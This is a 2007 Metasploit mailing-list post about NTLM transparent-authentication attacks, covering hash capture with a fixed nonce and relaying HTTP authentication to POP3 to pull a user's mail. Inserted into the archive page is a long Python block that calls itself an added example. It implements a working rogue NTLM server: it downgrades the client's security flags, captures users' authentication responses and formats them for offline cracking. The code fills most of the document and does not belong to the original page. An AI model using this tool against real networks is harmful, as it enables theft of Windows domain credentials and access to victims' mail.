Metasploit mailing list archives
Windows Transparent Authentication updates
From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Fri, 16 Nov 2007 09:44:33 -0600
Yesterday I submitted ticket #169 to update the NTLMSSP type code support in proto/smb/ui.rb. It adds a function to force negotiation away from NTLMv2 and signing as well as use bitmasking. This now makes it possible to support things like NTLM hash capturing with a predefined nonce over HTTP, IMAP, POP3, or NNTP.

I've not written any auxiliary/exploit modules for this yet mostly due to lack of time but I do have code available: http://grutz.jingojango.net/exploits/pokehashball.html

I've also coded up a protocol proxy that will take the authentication messages from HTTP and relay them between a POP3 server to download all available mail for a user. It's very brute-force at the moment but it does work. If I get some time to complete the entire tool I have in my head it'll include HTTP and IMAP proxying and more intelligent support for holding on to the browser and requesting authentication at-will.

Check out Rsnake's blog on an idea to use DNS Pinning to fake out IE's trust zone - http://ha.ckers.org/blog/20071112/effects-of-dns-rebinding-on-ies-trust-zones/

Very interesting theory but not sure it'll work that well given you need a very specific set of circumstances for transparent authentication to work in IE:

1. URL must be an internal IP address or hostname (no FQDN)
2. Server must send the correct domain workstation is a member of
3. Server must not be accessed via the proxy

That kind of limits attacks from the Internet for a large majority of locations but doesn't make it impossible. I'm excited!

If anyone has any activex code that could turn a browser into a usable proxy however... let me know. Half the battle with transparent auth is getting the browser to think it's talking to a "Trusted Intranet" computer. Having a machine on the inside is easiest so this attack is best served when you're on-site doing a penetration test.

So, enjoy! If you want to give a hand on writing some usable modules or expanding the existing project let me know.
-- 
..:[ grutz at jingojango dot net ]:..
GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4
"There's just no amusing way to say, 'I have a CISSP'."
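The server side of the "hash capture with a predefined nonce over HTTP" technique the post describes, as an added example that is not code from the post, from pokehashball, or from Metasploit's proto/smb/ui.rb. It builds an NTLMSSP Type 2 (CHALLENGE) message with a fixed 8-byte challenge, masks signing, sealing, key-exchange and the NTLM2-session-security flag out of whatever the client asked for in its Type 1, and parses the returned Type 3 (AUTHENTICATE) into a John/hashcat-style line. The challenge value, the target name "CORP"/"WORKGROUP", the `http_ntlm_step` helper and the client-side `build_type1`/`build_type3` builders (which frame caller-supplied response bytes and do no NTLM crypto) are all assumptions constructed for this example. One caveat a practitioner should keep in mind: stripping the extended-session-security flag only prevents the NTLM2-session variant of the response; whether the client answers with NTLMv1 or NTLMv2 is decided by its own LmCompatibilityLevel policy, which is why `crack_line` checks the NT response length rather than trusting the flags.

```python
import base64
import struct

# NTLMSSP negotiate flags (MS-NLMP 2.2.2.5), the subset this example touches.
NEGOTIATE_UNICODE = 0x00000001
NEGOTIATE_OEM = 0x00000002
REQUEST_TARGET = 0x00000004
NEGOTIATE_SIGN = 0x00000010
NEGOTIATE_SEAL = 0x00000020
NEGOTIATE_NTLM = 0x00000200
NEGOTIATE_ALWAYS_SIGN = 0x00008000
TARGET_TYPE_DOMAIN = 0x00010000
NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000  # "NTLM2 session" response
NEGOTIATE_128 = 0x20000000
NEGOTIATE_KEY_EXCH = 0x40000000
NEGOTIATE_56 = 0x80000000

SIGNATURE = b"NTLMSSP\x00"
# Assumed fixed server challenge (the "predefined nonce"): every captured
# response is then computed against the same 8 bytes.
FIXED_CHALLENGE = bytes.fromhex("1122334455667788")
# Flags the server refuses to echo back: no signing/sealing, no NTLM2
# session-security variant, no key exchange.
STRIP_MASK = (NEGOTIATE_SIGN | NEGOTIATE_SEAL | NEGOTIATE_ALWAYS_SIGN
              | NEGOTIATE_EXTENDED_SESSIONSECURITY | NEGOTIATE_KEY_EXCH)


def _field(data, off):
    """Read an NTLMSSP (Len, MaxLen, Offset) descriptor and return the bytes it points at."""
    length, _maxlen, offset = struct.unpack_from("<HHI", data, off)
    return data[offset:offset + length]


def build_type2(type1, target="WORKGROUP", challenge=FIXED_CHALLENGE):
    """Answer a NEGOTIATE (Type 1) with a CHALLENGE (Type 2) carrying a fixed nonce."""
    sig, mtype, client_flags = struct.unpack_from("<8sII", type1, 0)
    if sig != SIGNATURE or mtype != 1:
        raise ValueError("not an NTLMSSP Type 1 message")
    # Bitmask the client's request: drop what we never want, force the rest.
    flags = (client_flags & ~STRIP_MASK) | REQUEST_TARGET | TARGET_TYPE_DOMAIN | NEGOTIATE_NTLM
    if flags & NEGOTIATE_UNICODE:
        flags &= ~NEGOTIATE_OEM
        tname = target.encode("utf-16-le")
    else:
        tname = target.encode("ascii")
    hdr_len = 48  # sig(8) type(4) TargetName(8) flags(4) challenge(8) reserved(8) TargetInfo(8)
    msg = struct.pack("<8sI", SIGNATURE, 2)
    msg += struct.pack("<HHI", len(tname), len(tname), hdr_len)  # TargetName fields
    msg += struct.pack("<I", flags)
    msg += challenge
    msg += b"\x00" * 8  # Reserved
    msg += struct.pack("<HHI", 0, 0, hdr_len + len(tname))  # empty TargetInfo
    return msg + tname


def parse_type3(type3):
    """Pull the credential material out of an AUTHENTICATE (Type 3) message."""
    sig, mtype = struct.unpack_from("<8sI", type3, 0)
    if sig != SIGNATURE or mtype != 3 or len(type3) < 64:
        raise ValueError("not an NTLMSSP Type 3 message")
    flags = struct.unpack_from("<I", type3, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"
    return {
        "lm": _field(type3, 12),
        "nt": _field(type3, 20),
        "domain": _field(type3, 28).decode(enc),
        "user": _field(type3, 36).decode(enc),
        "workstation": _field(type3, 44).decode(enc),
    }


def crack_line(info, challenge=FIXED_CHALLENGE):
    """Format a capture as a John/hashcat NetNTLMv1 (5500) or NetNTLMv2 (5600) line."""
    nt = info["nt"]
    if len(nt) == 24:  # NTLMv1 (or NTLM2 session) response: user::DOMAIN:LM:NT:challenge
        return "%s::%s:%s:%s:%s" % (info["user"], info["domain"], info["lm"].hex(), nt.hex(), challenge.hex())
    # NTLMv2: 16-byte NTProofStr followed by the client blob: user::DOMAIN:challenge:proof:blob
    return "%s::%s:%s:%s:%s" % (info["user"], info["domain"], challenge.hex(), nt[:16].hex(), nt[16:].hex())


def auth_header(msg):
    """Wrap a raw NTLMSSP message the way it travels in HTTP Authorization / WWW-Authenticate."""
    return "NTLM " + base64.b64encode(msg).decode("ascii")


def http_ntlm_step(authorization, target="WORKGROUP"):
    """One round of the HTTP NTLM handshake, driven by the client's Authorization header value.

    Returns ("negotiate", value) when the server should answer 401 with that
    WWW-Authenticate value, or ("captured", line) once a Type 3 has arrived.
    """
    if not authorization or not authorization.startswith("NTLM "):
        return ("negotiate", "NTLM")  # bare token asks the browser for a Type 1
    msg = base64.b64decode(authorization[5:])
    mtype = struct.unpack_from("<I", msg, 8)[0]
    if mtype == 1:
        return ("negotiate", auth_header(build_type2(msg, target)))
    if mtype == 3:
        return ("captured", crack_line(parse_type3(msg)))
    raise ValueError("unexpected NTLMSSP message type %d" % mtype)


def build_type1(flags):
    """Constructed client Type 1 (what a browser sends first); only used to exercise the server side."""
    return struct.pack("<8sII", SIGNATURE, 1, flags) + struct.pack("<HHI", 0, 0, 32) * 2


def build_type3(user, domain, workstation, lm_resp, nt_resp, flags=NEGOTIATE_UNICODE | NEGOTIATE_NTLM):
    """Constructed client Type 3 framing with caller-supplied response bytes (no real NTLM crypto here)."""
    enc = "utf-16-le"
    fields = [lm_resp, nt_resp, domain.encode(enc), user.encode(enc), workstation.encode(enc), b""]
    hdr = struct.pack("<8sI", SIGNATURE, 3)
    payload = b""
    for f in fields:  # LM, NT, Domain, User, Workstation, EncryptedRandomSessionKey
        hdr += struct.pack("<HHI", len(f), len(f), 64 + len(payload))
        payload += f
    hdr += struct.pack("<I", flags)
    return hdr + payload
```

Because the challenge is constant, every line `crack_line` emits for NTLMv1 responses is crackable with a single precomputed table for that nonce, which is the whole point of fixing it; for NTLMv2 responses the client blob still carries a client nonce, so the fixed challenge only removes one of the two variable inputs. The three Intranet-zone conditions from the post are unaffected by any of this: the browser only sends a Type 1 at all if it has already decided the host is trusted.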
Current thread:
- Windows Transparent Authentication updates Kurt Grutzmacher (Nov 16)
- Windows Transparent Authentication updates Jonatan B (Nov 17)
- Windows Transparent Authentication updates Kurt Grutzmacher (Nov 17)
- Windows Transparent Authentication updates natronicus (Nov 19)
- Windows Transparent Authentication updates Kurt Grutzmacher (Nov 19)
- Windows Transparent Authentication updates Jonatan B (Nov 17)